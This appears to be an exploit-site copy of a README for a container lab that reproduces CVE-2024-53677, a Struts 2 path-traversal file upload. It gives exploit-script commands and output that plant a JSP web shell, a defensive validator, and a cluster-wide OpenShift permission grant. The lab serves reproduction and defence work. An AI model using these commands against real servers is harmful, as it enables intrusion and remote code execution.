## https://sploitus.com/exploit?id=F2757BC6-4EE5-5397-BBFA-E5FBA509FB27
# CVE-2024-53677 - Apache Struts 2 Remote Code Execution Vulnerability (RCE) Reproduction Environment
This repository provides a container-based environment to reproduce the CVE-2024-53677 vulnerability in Apache Struts 2. This vulnerability involves path traversal and allows for arbitrary code execution (RCE) through the file upload functionality in Struts 2.
## Setup Instructions
The environment can be built and run using Podman. Follow these steps to set up the application:
```sh
git clone https://github.com/seanrickerd/CVE-2024-53677.git
cd CVE-2024-53677
podman build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
podman run -d -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
```
Running the exploit:
```sh
pip install -r requirements.txt
python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files newshell.jsp --destination ../newshell.jsp
```
There is an intermittent issue where the file will upload properly but will not be accessible. To work around this, add an extra `.` to the destination (`.../shell.jsp`), run that once, then re-run the original command:
```sh
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination .../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: .../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/.../shell.jsp
[INFO] File not accessible. HTTP Status: 404
$ python S2-067.py -u http://localhost:8080 --upload_endpoint /upload.action --files shell.jsp --destination ../shell.jsp
[INFO] Uploading files to http://localhost:8080/upload.action...
[SUCCESS] File newshell.jsp uploaded successfully: ../shell.jsp
[INFO] Verifying uploaded file: http://localhost:8080/shell.jsp
[ALERT] File uploaded and accessible: http://localhost:8080/shell.jsp
```
The shell will then be accessible in a browser at http://localhost:8080/shell.jsp.
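A defender's counterpart to the traversal the transcript above relies on, added here as an example that is not part of this repository: a destination check that refuses `../shell.jsp` and the `.../shell.jsp` variant before anything is written to disk. The upload root, the allowed extensions and the function name are assumptions made for the example, not the Struts project's own fix.

```python
import posixpath
from typing import Optional, Tuple

# Constructed values for this example: where uploads are allowed to land and
# which extensions are accepted (no server-executable types such as .jsp).
UPLOAD_ROOT = "/var/uploads"
ALLOWED_SUFFIXES: Tuple[str, ...] = (".pdf", ".png", ".txt")


def check_destination(
    destination: str,
    upload_root: str = UPLOAD_ROOT,
    allowed_suffixes: Tuple[str, ...] = ALLOWED_SUFFIXES,
) -> Optional[str]:
    """Return the normalised on-disk path for an acceptable destination, else None.

    Every check runs on the caller-controlled string before any filesystem
    access, so values like "../shell.jsp" and ".../shell.jsp" are refused
    without the file ever being written.
    """
    # Reject empty names, NUL bytes (truncation tricks) and backslashes.
    if not destination or "\x00" in destination or "\\" in destination:
        return None
    # Reject absolute paths outright.
    if destination.startswith("/"):
        return None
    # Reject empty components and components made only of dots: this covers
    # ".", ".." and oddities such as "..." that some normalisers pass through.
    for part in destination.split("/"):
        if part == "" or set(part) == {"."}:
            return None
    # Allow only an explicit list of non-executable extensions (case-insensitive).
    if not destination.lower().endswith(allowed_suffixes):
        return None
    # Belt and braces: normalise and confirm the result still lies under the root.
    root = upload_root.rstrip("/") + "/"
    resolved = posixpath.normpath(posixpath.join(root, destination))
    if not resolved.startswith(root):
        return None
    return resolved
```

Keeping the upload root outside the servlet container's web root is the other half of the mitigation; even an accepted file then cannot be served or executed by Tomcat.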
## Running in OpenShift
OpenShift is secure by default, so you'll first need to allow the container to run as the UID its image specifies by granting the `anyuid` SCC. Note that granting it to `system:authenticated`, as below, applies to every authenticated user in the cluster; in a shared lab you may prefer to scope it to the deployment's own service account.
```sh
oc adm policy add-scc-to-group anyuid system:authenticated
```
If you wish to build the image yourself, you will also need to add the following lines to the Dockerfile:
```dockerfile
COPY --from=0 /usr/src/cve/target/upload-1.0.0.war /usr/local/tomcat/webapps/ROOT.war
COPY ./tomcat-users.xml /usr/local/tomcat/conf/tomcat-users.xml
COPY ./context.xml /usr/local/tomcat/webapps/manager/META-INF/context.xml
```
The following YAML creates a namespace called "vulnerables" and deploys the vulnerable container as a deployment with one replica, a service and a route allowing you to access the vulnerable workload.
If you've built the image yourself, you will need to change the image location in the YAML to point at your image.
```sh
oc create -f ocp-struts.yaml
```
You can find the route in Networking -> Routes.
